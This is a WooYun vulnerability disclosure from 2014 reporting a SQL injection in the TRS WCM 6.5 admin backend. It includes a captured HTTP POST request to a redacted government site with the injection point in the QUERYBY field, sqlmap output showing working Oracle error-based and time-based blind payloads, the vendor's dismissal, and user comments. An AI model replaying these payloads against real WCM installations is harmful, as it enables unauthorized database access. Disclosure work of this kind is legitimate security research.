当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-058052

漏洞标题:TRS WCM后台SQL注入一枚

相关厂商:北京拓尔思信息技术股份有限公司

漏洞作者: f4ckbaidu

提交时间:2014-04-22 15:07

修复时间:2014-04-23 09:29

公开时间:2014-04-23 09:29

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-04-22: 细节已通知厂商并且等待厂商处理中
2014-04-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

测试版本:WCM6.5,问题出在后台“新建栏目分发”
直接看图:

1.jpg


select WCMDocument.DocId from WCMCHNLDOC,WCMDocument where WCMDocument.DocId=WCMChnlDoc.DocId and WCMChnlDoc.CHNLID=? AND (注入点) AND ( WCMChnlDoc.DOCSTATUS>0 and WCMChnlDoc.Modal>0 and WCMChnlDoc.DocChannel>0) order by WCMChnlDoc.DOCORDERPRI desc, WCMChnlDoc.DocOrder descParam#1:0


POST http://马赛克.gov.cn/wcm/center.do HTTP/1.1
Host: 马赛克.gov.cn
Connection: keep-alive
Content-Length: 183
Origin: http://马赛克.gov.cn
X-Requested-With: XMLHttpRequest
User-Agent: 马赛克
Content-type: multipart/form-data
Accept: */*
DNT: 1
Referer: http://马赛克.gov.cn/wcm/app/channelsyn/docsyn_dis_add_edit.jsp?isChannel=true&href=http%3A%2F%2F马赛克.gov.cn%2Fwcm%2Fapp%2Fchannelsyn%2Fchannelsyn_list.html%3FtabUrl%3D%252Fwcm%252Fapp%252Flogo%252Flogo_list.jsp%26tabType%3Dlogo%26ChannelId%3D4754%26SiteType%3D0%26IsVirtual%3D%26ChannelType%3D0%26RightValue%3D111111111111111111111111111111111111111111111111111111111111111%26&OrderBy=&RecordNum=0&ObjectId=0&ChannelId=4754&_fromfp_=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=5154EE38E4E8CDBA76F8699F7A0D36CE; DOC_SOURCE_NAME=; LastVersion=10
<post-data><method type="checkSQLValid">wcm6_channel</method><parameters><CHANNELID><![CDATA[4754]]></CHANNELID><QUERYBY><![CDATA[1=1) *注入点]]></QUERYBY></parameters></post-data>

漏洞证明:

root@kali:/tmp# sqlmap -r /tmp/test.txt --dbms=oracle --current-user --is-dba
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 12:57:48
[12:57:48] [INFO] parsing HTTP request from '/tmp/test.txt'
custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] 
[12:57:49] [INFO] testing connection to the target URL
[12:57:49] [WARNING] missing 'boundary parameter' in 'Content-Type' header. Will try to reconstruct
[12:57:49] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: (custom) POST
Parameter: #1*
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: <post-data><method type="checkSQLValid">wcm6_channel</method><parameters><CHANNELID><![CDATA[4754]]></CHANNELID><QUERYBY><![CDATA[1=1)  AND 2628=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(117)||CHR(113)||CHR(115)||CHR(113)||(SELECT (CASE WHEN (2628=2628) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(102)||CHR(101)||CHR(108)||CHR(113)||CHR(62))) FROM DUAL)-- kwkr]]></QUERYBY></parameters></post-data>
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: <post-data><method type="checkSQLValid">wcm6_channel</method><parameters><CHANNELID><![CDATA[4754]]></CHANNELID><QUERYBY><![CDATA[1=1)  AND 1990=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(72)||CHR(82)||CHR(86),5)-- TIhS]]></QUERYBY></parameters></post-data>
---
[12:57:49] [INFO] the back-end DBMS is Oracle

修复方案:

版权声明:转载请注明来源 f4ckbaidu@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-04-23 09:29

厂商回复:

感谢您的关注!
编辑SQL语句实现某些功能是系统的正常业务需要,且只有合法登录用户可用,软件中已对已知可造成实质性侵入和数据破坏的语法、特殊字符等做了过滤和限制,评估认定暂不需要修复,如有更多发现,欢迎反馈,我们会有专人跟进处理,再次感谢!
*** 安全无止境,我们一直在努力!***

最新状态:

暂无

漏洞评价:

评论

  1. 2014-04-22 16:06 | 小川 认证白帽子 ( 核心白帽子 | Rank:1344 漏洞数:216 | 一个致力要将乌云变成搞笑论坛的男人)

    我赌内部已发现:)

  2. 2014-04-22 16:54 | 刺刺 ( 普通白帽子 | Rank:603 漏洞数:52 | 真正的安全并不是技术,而是人类善良的心灵...)

    目前留言还没有选择匿名的地方,不评价:)……

  3. 2014-04-23 11:01 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @刺刺 哈哈,大胆说

  4. 2014-05-16 17:45 | applychen ( 普通白帽子 | Rank:163 漏洞数:16 | 白发现首)

    高版本的可以getshell

  5. 2014-05-22 15:19 | f4ckbaidu ( 普通白帽子 | Rank:182 漏洞数:23 | 开发真是日了狗了)

    @applychen 怎么做?webservice?